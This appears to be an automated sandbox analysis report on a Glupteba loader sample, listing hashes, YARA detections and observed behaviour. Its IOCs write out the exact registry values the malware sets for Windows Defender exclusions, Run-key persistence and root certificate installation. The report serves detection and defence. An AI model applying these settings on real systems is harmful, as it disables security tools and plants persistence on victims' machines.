General
Target

6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

Filesize

3MB

Completed

20-05-2022 22:29

Task

behavioral1

Score
10/10
MD5

c40e14338592240c54c328318963b3bb

SHA1

0026ef8f4f8baaeda070e1f306e2a7618a8b2e6d

SHA256

6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a

SHA512

292bb0075078174a848ee6a7ce74654bcfbdb1ba590461c9cc3203ae9d0286a5965c34ff6b317d05372e517238c504aeb0dc1ae9523ca6a311ec27c6583aab95

Malware Config
Signatures 18

Defense Evasion
Discovery
Persistence
  • Glupteba

    Description

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload

    Reported IOCs

    resource | yara_rule
    behavioral1/memory/1120-56-0x00000000027E0000-0x0000000002ED6000-memory.dmp | family_glupteba
    behavioral1/memory/1120-57-0x0000000000400000-0x0000000000B10000-memory.dmp | family_glupteba
    behavioral1/memory/1292-63-0x0000000000400000-0x0000000000B10000-memory.dmp | family_glupteba
    behavioral1/memory/1764-70-0x0000000000400000-0x0000000000B10000-memory.dmp | family_glupteba
  • Windows security bypass

    TTPs

    Disabling Security Tools, Modify Registry
  • Executes dropped EXE
    csrss.exe, patch.exe

    Reported IOCs

    pid | process
    1764 | csrss.exe
    580 | patch.exe
    1384 | 
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Loads dropped DLL
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe, patch.exe

    Reported IOCs

    pid | process
    1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    888 | 
    580 | patch.exe
    580 | patch.exe
    580 | patch.exe
    580 | patch.exe
    580 | patch.exe
    1384 | 
    580 | patch.exe
    580 | patch.exe
    580 | patch.exe
  • Windows security modification
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

    TTPs

    Disabling Security Tools, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\58b266ea2548.exe = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\58b266ea2548\58b266ea2548 = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\MistySound = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Adds Run key to start application
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows\CurrentVersion\Run\MistySound = "\"C:\\Windows\\rss\\csrss.exe\"" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Modifies boot configuration data using bcdedit
    bcdedit.exe

    Reported IOCs

    pid | process
    1412 | bcdedit.exe
  • Drops file in System32 directory
    csrss.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A | csrss.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A | csrss.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 | csrss.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 | csrss.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 | csrss.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 | csrss.exe
  • Drops file in Windows directory
    makecab.exe, 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Windows\Logs\CBS\CbsPersist_20220521002659.cab | makecab.exe
    File opened for modification | C:\Windows\rss | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    File created | C:\Windows\rss\csrss.exe | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Creates scheduled task(s)
    schtasks.exe, schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    1032 | schtasks.exe
    1216 | schtasks.exe
  • Modifies data under HKEY_USERS
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe, csrss.exe, netsh.exe

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | csrss.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | csrss.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | netsh.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | csrss.exe
    Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | netsh.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | csrss.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | csrss.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | netsh.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | csrss.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | csrss.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | csrss.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | csrss.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
  • Modifies system certificate store
    csrss.exe

    TTPs

    Install Root Certificate, Modify Registry

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | csrss.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | csrss.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | csrss.exe
  • Suspicious behavior: EnumeratesProcesses
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe, 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe, csrss.exe

    Reported IOCs

    pid | process
    1120 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    1764 | csrss.exe
    1764 | csrss.exe
  • Suspicious use of AdjustPrivilegeToken
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe, csrss.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1120 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Token: SeImpersonatePrivilege | 1120 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe
    Token: SeSystemEnvironmentPrivilege | 1764 | csrss.exe
  • Suspicious use of WriteProcessMemory
    6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe, cmd.exe, csrss.exe

    Reported IOCs

    description | pid | process | target process
    PID 1292 wrote to memory of 1696 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | cmd.exe
    PID 1292 wrote to memory of 1696 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | cmd.exe
    PID 1292 wrote to memory of 1696 | 1292 | 6be50ece7dd7688a2c951307b1eb8a78544dc360fccb3dcc44b42e33c7d3351a.exe | cmd.exe
